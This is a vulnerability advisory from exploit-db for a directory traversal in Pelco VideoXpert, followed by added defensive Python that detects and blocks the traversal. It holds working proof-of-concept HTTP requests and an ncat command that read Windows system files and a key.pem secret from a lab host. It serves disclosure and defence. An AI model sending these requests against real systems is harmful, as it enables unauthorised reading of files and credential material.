Pelco VideoXpert 1.12.105 – Directory Traversal

  • Author: LiquidWorm
  • Date: 2017-07-10
  • Category:
  • Platform:
  • Source: https://www.exploit-db.com/exploits/42311/
  • Schneider Electric Pelco VideoXpert Core Admin Portal Directory Traversal
    
    
    Vendor: Schneider Electric SE
    Product web page: https://www.pelco.com
    Affected version: 2.0.41
                      1.14.7
                      1.12.105
    
    Summary: VideoXpert is a video management solution designed for
    scalability, fitting the needs of surveillance operations of any size.
    VideoXpert Ultimate can also aggregate other VideoXpert systems,
    tying multiple video management systems into a single interface.
    
    Desc: Pelco VideoXpert suffers from a directory traversal vulnerability.
    Exploiting this issue allows an unauthenticated attacker to read
    arbitrary files on the host with the privileges of the web server process.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Jetty(9.2.6.v20141205)
               MongoDB/3.2.10
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2017-5419
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
    
    
    05.04.2017
    
    --
    
    
    PoC:
    ----
    
    GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1
    Host: 172.19.0.198
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    
    
    HTTP/1.1 200 OK
    Date: Wed, 05 Apr 2017 13:27:39 GMT
    Last-Modified: Tue, 14 Jul 2009 05:09:22 GMT
    Cache-Control: public, max-age=86400
    Content-Type: text/html; charset=UTF-8
    Vary: Accept-Encoding
    ETag: 1247548162000
    Content-Length: 403
    Connection: close
    
    ; for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1
    [MCI Extensions.BAK]
    3g2=MPEGVideo
    3gp=MPEGVideo
    3gp2=MPEGVideo
    3gpp=MPEGVideo
    aac=MPEGVideo
    adt=MPEGVideo
    adts=MPEGVideo
    m2t=MPEGVideo
    m2ts=MPEGVideo
    m2v=MPEGVideo
    m4a=MPEGVideo
    m4v=MPEGVideo
    mod=MPEGVideo
    mov=MPEGVideo
    mp4=MPEGVideo
    mp4v=MPEGVideo
    mts=MPEGVideo
    ts=MPEGVideo
    tts=MPEGVideo
    
    
    ------
    
    
    GET /portal//..\\\..\\\..\\\..\\\ProgramData\Pelco\Core\db\security\key.pem HTTP/1.1
    Host: 172.19.0.198
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    
    
    HTTP/1.1 200 OK
    Date: Thu, 06 Apr 2017 11:59:07 GMT
    Last-Modified: Wed, 05 Apr 2017 12:58:36 GMT
    Cache-Control: public, max-age=86400
    Content-Type: text/html; charset=UTF-8
    ETag: 1491397116000
    Content-Length: 9
    Connection: close
    
    T0ps3cret
    
    
    ------
    
    
    bash-4.4$ cat pelco_system_ini.txt
    GET /portal//..\\\..\\\..\\\..\\\windows\system.ini HTTP/1.1
    Host: 172.19.0.198
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    
    bash-4.4$ ncat -v -n 172.19.0.198 80 < pelco_system_ini.txt
    Ncat: Version 7.40 ( https://nmap.org/ncat )
    Ncat: Connected to 172.19.0.198:80.
    HTTP/1.1 200 OK
    Date: Thu, 06 Apr 2017 12:30:01 GMT
    Last-Modified: Wed, 10 Jun 2009 21:08:04 GMT
    Cache-Control: public, max-age=86400
    Content-Type: text/html; charset=UTF-8
    ETag: 1244668084000
    Content-Length: 219
    Connection: close
    
    ; for 16-bit app support
    [386Enh]
    woafont=dosapp.fon
    EGA80WOA.FON=EGA80WOA.FON
    EGA40WOA.FON=EGA40WOA.FON
    CGA80WOA.FON=CGA80WOA.FON
    CGA40WOA.FON=CGA40WOA.FON
    
    [drivers]
    wave=mmdrv.dll
    timer=timer.drv
    
    [mci]
    Ncat: 220 bytes sent, 460 bytes received in 0.03 seconds.
    bash-4.4$
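The requests above work because the portal maps the client-supplied target onto the filesystem without first canonicalising it: backslashes are honoured as separators on the Windows host, and the repeated `..` segments walk out of the web root. The following Python is an added example written for this page from a defender's side; it is not code from the advisory author, from exploit-db or from Pelco. It shows (1) a normaliser that treats `\` and percent-encoding the way a lenient server would, (2) a log scan that flags requests escaping the web root, run over a constructed log excerpt that includes the `win.ini` request target from the PoC, and (3) the containment check a file-serving handler needs before opening anything. The web root `/opt/vxcore/www`, the client addresses and the log lines are assumptions made for the demonstration.

```python
"""Detecting and blocking the traversal pattern from ZSL-2017-5419.

Added example for this advisory; not code from the advisory author or from
Pelco. The web root, client addresses and log lines are constructed.
"""
import posixpath
import re
from urllib.parse import unquote

# Request line inside a Common Log Format entry; only the target is needed.
_REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def normalize_target(raw_target: str) -> str:
    """Canonicalise a request target the way a lenient Windows-hosted server
    would before touching the filesystem: drop the query string, undo
    percent-encoding (repeated, so double-encoding does not slip through),
    treat '\\' as a separator and collapse runs of '/'."""
    path = raw_target.split("?", 1)[0]
    for _ in range(3):  # decode until stable; three rounds is plenty
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/")
    return re.sub(r"/+", "/", path)


def escapes_root(raw_target: str) -> bool:
    """True when the normalised target climbs above the web root.

    A depth counter is walked over the segments: '..' at depth 0 means the
    request is leaving the root. This is deliberately not a grep for '..',
    since '/portal/img/../css/site.css' is legitimate and stays inside."""
    depth = 0
    for segment in normalize_target(raw_target).split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            if depth == 0:
                return True
            depth -= 1
        else:
            depth += 1
    return False


def find_traversal_requests(log_lines):
    """Return (line_number, target) for each logged request that escapes root."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = _REQUEST_RE.search(line)
        if match and escapes_root(match.group("target")):
            hits.append((number, match.group("target")))
    return hits


def safe_resolve(web_root: str, raw_target: str):
    """Map a target to a filesystem path, or return None if it leaves web_root.

    This is the check the file-serving handler was missing: canonicalise
    first, then test containment, instead of trusting client separators.
    posixpath is used on purpose so the logic is identical on any host."""
    root = posixpath.normpath(web_root)
    relative = normalize_target(raw_target).lstrip("/")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None


# Constructed log excerpt: line 3 carries the request target from the PoC
# above, line 4 is benign '..' use that stays inside the root, line 5 is a
# percent-encoded form that a naive string match would miss.
SAMPLE_LOG = [
    r'10.0.0.7 - - [05/Apr/2017:13:27:39 +0000] "GET /portal/index.html HTTP/1.1" 200 5120',
    r'10.0.0.7 - - [05/Apr/2017:13:27:40 +0000] "GET /portal/js/app.js HTTP/1.1" 200 8830',
    r'10.0.0.9 - - [05/Apr/2017:13:27:41 +0000] "GET /portal//..\\\..\\\..\\\..\\\windows\win.ini HTTP/1.1" 200 403',
    r'10.0.0.7 - - [05/Apr/2017:13:27:42 +0000] "GET /portal/img/../css/site.css HTTP/1.1" 200 1201',
    r'10.0.0.9 - - [05/Apr/2017:13:27:43 +0000] "GET /portal/%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1" 200 403',
]

if __name__ == "__main__":
    for number, target in find_traversal_requests(SAMPLE_LOG):
        print(f"line {number}: traversal attempt {target!r}")
    print(safe_resolve("/opt/vxcore/www", "/portal/css/site.css"))
    print(safe_resolve("/opt/vxcore/www", r"/portal//..\\\..\\\..\\\..\\\windows\win.ini"))
```

Two design points matter here. `escapes_root` counts depth rather than searching for `..`, so relative references that never leave the root do not generate noise, and the log scan only fires on the two constructed lines that actually climb out. `safe_resolve` is the server-side fix: it decides containment on the canonical path, after separators and encoding have been normalised, which is the order in which the vulnerable handler should have done it.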